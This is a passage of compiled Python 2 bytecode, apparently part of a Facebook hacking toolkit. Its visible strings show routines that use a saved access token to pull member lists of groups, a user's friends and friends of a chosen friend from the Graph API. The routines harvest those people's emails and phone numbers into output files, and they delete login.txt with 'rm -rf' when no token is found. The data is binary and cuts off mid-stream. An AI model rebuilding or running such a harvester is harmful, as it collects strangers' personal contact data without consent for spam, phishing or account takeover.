g-C\x1c\xeb\xe26\x1a?sW\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get email from member group \x1b[1;97m....s1\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal Email \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x80\x00\x00\x00R \x00\x00\x00t\x05\x00\x00\x00emmemR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00Rg\x00\x00\x00R\x95\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x0b\x00\x00\x00R4\x00\x00\x00Rj\x00\x00\x00R\'\x00\x00\x00R\xa0\x00\x00\x00R\x98\x00\x00\x00R\xa1\x00\x00\x00R\xa2\x00\x00\x00Rm\x00\x00\x00R\x10\x00\x00\x00R\x1e\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x8a\x00\x00\x00H\x02\x00\x00s~\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\n\x01\t\x01\x0f\x01\x1b\x01\x12\x01\x11\x01\x1f\x01\x12\x01\x03\x01\x11\x01\x15\x010\x00\r\x00\x11\x01\r\x01\x08\x01\n\x01\t\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\x0b\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s"\x03\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x02\x00k\n\x00rR\x00\x01\x01\x01d\x03\x00GHt\x03\x00j\x04\x00d\x04\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x05\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x03\x00j\x08\x00d\x06\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00rw\x00\x01\x01\x01n\x01\x00Xy\x08\x02t\x03\x00j\x04\x00d\x07\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00d\x08\x00\x83\x01\x00}\x01\x00y>\x00t\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\x0e\x00j\x0f\x00|\x02\x00j\x10\x00\x83\x01\x00}\x03\x00d\x0b\x00|\x03\x00d\x0c\x00\x19\x17GHWn\'\x00\x04t\x11\x00k\n\x00r\x00\x01\x01\x01\x01d\r\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n\x01\x00Xt\x13\x00d\x0f\x00\x83\x01\x00\x01d\x10\x00d\x11\x00\x14GHt\x00\x00d\x12\x00d\x13\x00\x83\x02\x00}\x04\x00t\x0c\x00j\r\x00d\x14\x00|\x01\x00\x17d\x15\x00\x17|\x00\x00\x17\x83\x01\x00}\x05\x00t\x0e\x00j\x0f\x00|\x05\x00j\x10\x00\x83\x01\x00}\x06\x00x\xcb\x00|\x06\x00d\x16\x00\x19D]\xbf\x00}\x07\x00t\x0c\x00j\r\x00d\x14\x00|\x07\x00d\x17\x00\x19\x17d\x18\x00\x17|\x00\x00\x17\x83\x01\x00}\x08\x00t\x0e\x00j\x0f\x00|\x08\x00j\x10\x00\x83\x01\x00}\t\x00yt\x00t\x14\x00j\x15\x00|\t\x00d\x19\x00\x19\x83\x01\x00\x01|\x04\x00j\x16\x00|\t\x00d\x19\x00\x19d\x1a\x00\x17\x83\x01\x00\x01d\x1b\x00t\x17\x00t\x18\x00t\x14\x00\x83\x01\x00\x83\x01\x00\x17d\x1c\x00\x17|\t\x00d\x19\x00\x19\x17d\x1d\x00\x17|\t\x00d\x0c\x00\x19\x17d\x1a\x00\x17Gt\x19\x00j\x1a\x00j\x1b\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x1e\x00\x83\x01\x00\x01Wq[\x01\x04t\x11\x00k\n\x00r\x19\x02\x01\x01\x01q[\x01Xq[\x01W|\x04\x00j\x1c\x00\x83\x00\x00\x01d\x10\x00d\x11\x00\x14GHd\x1f\x00GHd \x00t\x18\x00t\x14\x00\x83\x01\x00\x16GHt\x0b\x00d!\x00\x83\x01\x00}\n\x00t\x03\x00j\x1d\x00d\x12\x00d"\x00|\n\x00\x17\x83\x02\x00\x01d#\x00|\n\x00\x17GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x02\x00k\n\x00r\xa9\x02\x01\x01\x01d$\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00r\xd5\x02\x01\x01\x01d%\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nI\x00\x04t\x11\x00k\n\x00r\xfb\x02\x01\x01\x01d&\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n#\x00\x04t\x0c\x00j \x00j!\x00k\n\x00r\x1d\x03\x01\x01\x01d\'\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S((\x00\x00\x00Ns\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00R&\x00\x00\x00s1\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID group \x1b[1;91m:\x1b[1;97m s%\x00\x00\x00https://graph.facebook.com/group/?id=s\x0e\x00\x00\x00&access_token=s=\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom group \x1b[1;91m:\x1b[1;97m R0\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Group not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s<\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet group member phone number \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x16\x00\x00\x00out/no_member_grup.txtR\x11\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s5\x00\x00\x00/members?fields=name,id&limit=999999999&access_token=Rl\x00\x00\x00Rj\x00\x00\x00s\x0e\x00\x00\x00?access_token=Rw\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97ms\x03\x00\x00\x00 | g-C\x1c\xeb\xe26\x1a?s^\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get phone number from member group \x1b[1;97m....s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal Number \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x80\x00\x00\x00R \x00\x00\x00t\x05\x00\x00\x00nomemR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00Rg\x00\x00\x00R\x95\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x0b\x00\x00\x00R4\x00\x00\x00Rj\x00\x00\x00R\'\x00\x00\x00R\xa0\x00\x00\x00R\x98\x00\x00\x00R\xa1\x00\x00\x00R\xa2\x00\x00\x00Rm\x00\x00\x00R\x10\x00\x00\x00R\x1e\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x8b\x00\x00\x00\x88\x02\x00\x00s~\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\n\x01\t\x01\x0f\x01\x1b\x01\x12\x01\x11\x01\x1f\x01\x12\x01\x03\x01\x11\x01\x15\x010\x00\r\x00\x11\x01\r\x01\x08\x01\n\x01\t\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\x08\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xa6\x02\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x02\x00k\n\x00rR\x00\x01\x01\x01d\x03\x00GHt\x03\x00j\x04\x00d\x04\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x05\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x03\x00j\x08\x00d\x06\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00rw\x00\x01\x01\x01n\x01\x00Xy\x8c\x01t\x03\x00j\x04\x00d\x07\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00j\x0c\x00d\x08\x00|\x00\x00\x17\x83\x01\x00}\x01\x00t\r\x00j\x0e\x00|\x01\x00j\x0f\x00\x83\x01\x00}\x02\x00t\x10\x00d\t\x00\x83\x01\x00\x01d\n\x00d\x0b\x00\x14GHt\x00\x00d\x0c\x00d\r\x00\x83\x02\x00}\x03\x00x\xcb\x00|\x02\x00d\x0e\x00\x19D]\xbf\x00}\x04\x00t\x0b\x00j\x0c\x00d\x0f\x00|\x04\x00d\x10\x00\x19\x17d\x11\x00\x17|\x00\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x0e\x00|\x05\x00j\x0f\x00\x83\x01\x00}\x06\x00yt\x00t\x11\x00j\x12\x00|\x06\x00d\x12\x00\x19\x83\x01\x00\x01|\x03\x00j\x13\x00|\x06\x00d\x12\x00\x19d\x13\x00\x17\x83\x01\x00\x01d\x14\x00t\x14\x00t\x15\x00t\x11\x00\x83\x01\x00\x83\x01\x00\x17d\x15\x00\x17|\x06\x00d\x12\x00\x19\x17d\x16\x00\x17|\x06\x00d\x17\x00\x19\x17d\x13\x00\x17Gt\x16\x00j\x17\x00j\x18\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x18\x00\x83\x01\x00\x01Wq\xdf\x00\x04t\x19\x00k\n\x00r\x9d\x01\x01\x01\x01q\xdf\x00Xq\xdf\x00W|\x03\x00j\x1a\x00\x83\x00\x00\x01d\n\x00d\x0b\x00\x14GHd\x19\x00GHd\x1a\x00t\x15\x00t\x11\x00\x83\x01\x00\x16GHt\x1b\x00d\x1b\x00\x83\x01\x00}\x07\x00t\x03\x00j\x1c\x00d\x0c\x00d\x1c\x00|\x07\x00\x17\x83\x02\x00\x01d\x1d\x00|\x07\x00\x17GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x02\x00k\n\x00r-\x02\x01\x01\x01d\x1f\x00GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00rY\x02\x01\x01\x01d \x00GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01nI\x00\x04t\x19\x00k\n\x00r\x7f\x02\x01\x01\x01d!\x00GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01n#\x00\x04t\x0b\x00j \x00j!\x00k\n\x00r\xa1\x02\x01\x01\x01d"\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(#\x00\x00\x00Ns\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00R&\x00\x00\x00s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=s3\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all friend email \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x13\x00\x00\x00out/email_teman.txtR\x11\x00\x00\x00Rl\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/Rj\x00\x00\x00s\x0e\x00\x00\x00?access_token=R?\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97ms\x03\x00\x00\x00 | R0\x00\x00\x00g-C\x1c\xeb\xe26\x1a?sE\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get email \x1b[1;97m....s1\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal Email \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R \x00\x00\x00t\x02\x00\x00\x00emR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00R,\x00\x00\x00Rg\x00\x00\x00R/\x00\x00\x00R\x95\x00\x00\x00R\x80\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x08\x00\x00\x00R4\x00\x00\x00R\'\x00\x00\x00Rm\x00\x00\x00R\x98\x00\x00\x00R\x13\x00\x00\x00R\x10\x00\x00\x00R\x1e\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R?\x00\x00\x00\xc8\x02\x00\x00sl\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x13\x01\x12\x01\n\x01\t\x01\x0f\x01\x11\x01\x1f\x01\x12\x01\x03\x01\x11\x01\x15\x010\x00\r\x00\x11\x01\r\x01\x08\x01\n\x01\t\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\x0b\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s/\x03\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\x08\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xy\x08\x02t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00d\x08\x00\x83\x01\x00}\x01\x00y>\x00t\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\x0e\x00j\x0f\x00|\x02\x00j\x10\x00\x83\x01\x00}\x03\x00d\x0b\x00|\x03\x00d\x0c\x00\x19\x17GHWn\'\x00\x04t\x11\x00k\n\x00r\r\x01\x01\x01\x01d\r\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n\x01\x00Xt\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\x0f\x00\x17|\x00\x00\x17\x83\x01\x00}\x04\x00t\x0e\x00j\x0f\x00|\x04\x00j\x10\x00\x83\x01\x00}\x05\x00t\x13\x00d\x10\x00\x83\x01\x00\x01d\x11\x00d\x12\x00\x14GHt\x02\x00d\x13\x00d\x14\x00\x83\x02\x00}\x06\x00x\xcb\x00|\x05\x00d\x15\x00\x19D]\xbf\x00}\x07\x00t\x0c\x00j\r\x00d\t\x00|\x07\x00d\x16\x00\x19\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x08\x00t\x0e\x00j\x0f\x00|\x08\x00j\x10\x00\x83\x01\x00}\t\x00yt\x00t\x14\x00j\x15\x00|\t\x00d\x17\x00\x19\x83\x01\x00\x01|\x06\x00j\x16\x00|\t\x00d\x17\x00\x19d\x18\x00\x17\x83\x01\x00\x01d\x19\x00t\x17\x00t\x18\x00t\x14\x00\x83\x01\x00\x83\x01\x00\x17d\x1a\x00\x17|\t\x00d\x17\x00\x19\x17d\x1b\x00\x17|\t\x00d\x0c\x00\x19\x17d\x18\x00\x17Gt\x19\x00j\x1a\x00j\x1b\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x1c\x00\x83\x01\x00\x01Wqh\x01\x04t\x11\x00k\n\x00r&\x02\x01\x01\x01qh\x01Xqh\x01W|\x06\x00j\x1c\x00\x83\x00\x00\x01d\x11\x00d\x12\x00\x14GHd\x1d\x00GHd\x1e\x00t\x18\x00t\x14\x00\x83\x01\x00\x16GHt\x0b\x00d\x1f\x00\x83\x01\x00}\n\x00t\x00\x00j\x1d\x00d\x13\x00d \x00|\n\x00\x17\x83\x02\x00\x01d!\x00|\n\x00\x17GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x04\x00k\n\x00r\xb6\x02\x01\x01\x01d"\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00r\xe2\x02\x01\x01\x01d#\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nI\x00\x04t\x11\x00k\n\x00r\x08\x03\x01\x01\x01d$\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n#\x00\x04t\x0c\x00j \x00j!\x00k\n\x00r*\x03\x01\x01\x01d%\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(&\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00s2\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID friend \x1b[1;91m: \x1b[1;97ms\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s7\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m R0\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;91m[!] Friend not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x16\x00\x00\x00/friends?access_token=s?\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all friend email from friend \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x1b\x00\x00\x00out/em_teman_from_teman.txtR\x11\x00\x00\x00Rl\x00\x00\x00Rj\x00\x00\x00R?\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97ms\x03\x00\x00\x00 | g-C\x1c\xeb\xe26\x1a?sE\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get email \x1b[1;97m....s1\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal Email \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x80\x00\x00\x00R \x00\x00\x00t\x0b\x00\x00\x00emfromtemanR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00Rg\x00\x00\x00R\x95\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x0b\x00\x00\x00R4\x00\x00\x00R\x9c\x00\x00\x00R\x9d\x00\x00\x00R\x9e\x00\x00\x00R\'\x00\x00\x00Rm\x00\x00\x00R\x98\x00\x00\x00R\x13\x00\x00\x00R\x10\x00\x00\x00R\x1e\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x8c\x00\x00\x00\xff\x02\x00\x00s\x80\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\x1b\x01\x12\x01\n\x01\t\x01\x0f\x01\x11\x01\x1f\x01\x12\x01\x03\x01\x11\x01\x15\x010\x00\r\x00\x11\x01\r\x01\x08\x01\n\x01\t\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\x08\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xb9\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\x08\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xy\x92\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00d\x08\x00\x83\x01\x00\x01d\t\x00d\n\x00\x14GHd\x0b\x00|\x00\x00\x17}\x01\x00t\x0c\x00j\r\x00|\x01\x00\x83\x01\x00}\x02\x00t\x0e\x00j\x0f\x00|\x02\x00j\x10\x00\x83\x01\x00}\x03\x00t\x02\x00d\x0c\x00d\r\x00\x83\x02\x00}\x04\x00x\xcb\x00|\x03\x00d\x0e\x00\x19D]\xbf\x00}\x05\x00t\x0c\x00j\r\x00d\x0f\x00|\x05\x00d\x10\x00\x19\x17d\x11\x00\x17|\x00\x00\x17\x83\x01\x00}\x06\x00t\x0e\x00j\x0f\x00|\x06\x00j\x10\x00\x83\x01\x00}\x03\x00yt\x00t\x11\x00j\x12\x00|\x03\x00d\x12\x00\x19\x83\x01\x00\x01|\x04\x00j\x13\x00|\x03\x00d\x12\x00\x19d\x13\x00\x17\x83\x01\x00\x01d\x14\x00t\x14\x00t\x15\x00t\x11\x00\x83\x01\x00\x83\x01\x00\x17d\x15\x00\x17|\x03\x00d\x12\x00\x19\x17d\x16\x00\x17|\x03\x00d\x17\x00\x19\x17d\x13\x00\x17Gt\x16\x00j\x17\x00j\x18\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x18\x00\x83\x01\x00\x01Wq\xf2\x00\x04t\x19\x00k\n\x00r\xb0\x01\x01\x01\x01q\xf2\x00Xq\xf2\x00W|\x04\x00j\x1a\x00\x83\x00\x00\x01d\t\x00d\n\x00\x14GHd\x19\x00GHd\x1a\x00t\x15\x00t\x11\x00\x83\x01\x00\x16GHt\x1b\x00d\x1b\x00\x83\x01\x00}\x07\x00t\x00\x00j\x1c\x00d\x0c\x00d\x1c\x00|\x07\x00\x17\x83\x02\x00\x01d\x1d\x00|\x07\x00\x17GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x04\x00k\n\x00r@\x02\x01\x01\x01d\x1f\x00GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t